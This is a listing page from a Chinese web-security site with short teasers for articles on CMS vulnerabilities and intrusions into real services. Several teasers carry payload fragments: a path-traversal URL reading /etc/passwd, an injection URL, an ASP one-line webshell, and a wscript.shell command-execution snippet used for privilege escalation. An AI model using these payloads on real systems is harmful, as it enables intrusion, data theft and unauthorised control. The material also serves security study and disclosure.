TAYGOD免费企业建站系统无验证添加管理员实战及关注热度:10

①无验证添加管理员②留言本XSS漏洞详细说明：①无验证添加管理员漏洞文件：Admin_Add.asp漏洞代码：!--#include file=../../config/conn.asp--!--#include file=md5.asp--%if request.QueryString(.....[详情]

对金山游戏的一次渗透测试 - 网站安全 - 自学关注热度:15

本来只想看下金山的某个后台有没有注入啥的可以绕过，谁知道...接下来就是各种游戏服务器提权等。服务器连接内网，但是没有继续渗透。涉及的游戏有月影传说，剑侠二等。话说金..[详情]

不支持PHP情况下，3306端口的提权 - 网站安全 - 自关注热度:12

有root密码了，Navicat连接上去执行sql语句create table a (cmd text);insert into a values (set wshshell=createobject (wscript.shell ) );insert into a values (a=wshshell.run (cmd.e.....[详情]

问题ewebeditor编辑器突破安全狗 - 网站安全 - 自学关注热度:19

题目说到了问题和突破，问题的ewebeditor程序，这儿程序问题出来哪儿呢？1.登陆的地方被删除了，也就是admin_login.asp这个页面被删除了。 2.是post提交好像有问题，不管点击那个提交pos..[详情]

世纪东方建站超市上传漏洞+源码泄漏 - 网站安全关注热度:11

目标:http://jzcs.51web.com/先注册个用户..进入互助问答http://jzcs.51web.com/maq/class/下面有上传啊 哈.直接本地构造个表单 可以使上传文件任意名(后缀必须是jpg什么的).,利用IIS6解析就行了..这是..[详情]

ECMall后台拿webshell - 网站安全 - 自学php关注热度:13

基友叫我看一个ECMall 的站点 求后台拿webshell我发下思路首先我也是第一次搞ECMall 后台拿shell所以慢慢看发现了有一处挂件管理可编辑文件然后选择最后一个编辑注册加盟和注册按钮挂机..[详情]

AJAX也有安全隐患 谈谈AJAX的安全性 - 网站安全关注热度:16

Web开发者不会注意到由 AJAX(Asynchronous JavaScript And XML)所带来的激情。不费力气就能创建像Google Suggest那样的智能网站或者像Gmail那样基于Web的应用程序，这在很大程度上要归功于这种技术..[详情]

xss漏洞和csrf漏洞防御 - 网站安全 - 自学php关注热度:13

xss防御：1、尽量少将域名的domain设为域名的根下面，减少分站xss漏洞对主站的影响；2、对输入的数据进行过滤检查：public static String htmlSpecialChars(final String s) { String result = s; re.....[详情]

Thinksns微博系统注入漏洞一枚 - 网站安全 - 自学关注热度:18

Exp:http://t.thinksns.com/index.php?app=blogmod=Indexact=showid=2211..[详情]

SpeedCMS智能企业网站管理系统任意文件读取 - 网站关注热度:14

http://xxx.com/Article/file/cid/534/?file=../../../../../../../etc/passwd..[详情]

马克思cms后台拿shell方法 - 网站安全 - 自学php关注热度:16

这个方法容易引起出错，如果用这个方法建议用最快的速度给恢复。我本地显示样式问题。%%execute(request(chr(35)))%%#39;输入代码。配置文件插入一句话一句话连接地址：http://www.2cto.com /i..[详情]

盛大云主机致命缺陷致同一物理机用户信息泄露关注热度:9

盛大云主机存在一个致命架构缺陷, 导致用户敏感信息泄露。 同一台物理真实主机的所有子虚拟主机都是共用一个网卡. 这导致了,只要云主机的子虚拟主机打开网卡混杂模式时,就能通过..[详情]

《读者》订阅金额漏洞测试 - 网站安全 - 自学p关注热度:8

http://www.duzhe.com/order/order.action 生成订单后开始付款，chrome开起来。直接跳到支付宝了，后面不敢测试了，就到这里了，不知道能不能返回支付成功的状态。不能的话不要喷我。。作者：..[详情]

XSS漏洞渗透新浪微博《头条新闻》账号 - 网站安关注热度:21

惊闻新浪要高薪聘请会XSS的安全工程师，于是用XSS漏洞测试了下新浪微博《头条新闻》账号，来了场XSS屌丝的逆袭。用XSS得到COOKIE直接就能控制微博，头条新闻这个微博还是比较重要的..[详情]

百度某分站命令执行及修复 - 网站安全 - 自学p关注热度:13

百度某分站存在过滤不严格，导致命令执行mtc.baidu.com是百度对外开发用于测试各类手机操作系统的一个平台但是由于对用户执行的命令过滤不严格，导致可以跨过系统限制，直接在虚拟..[详情]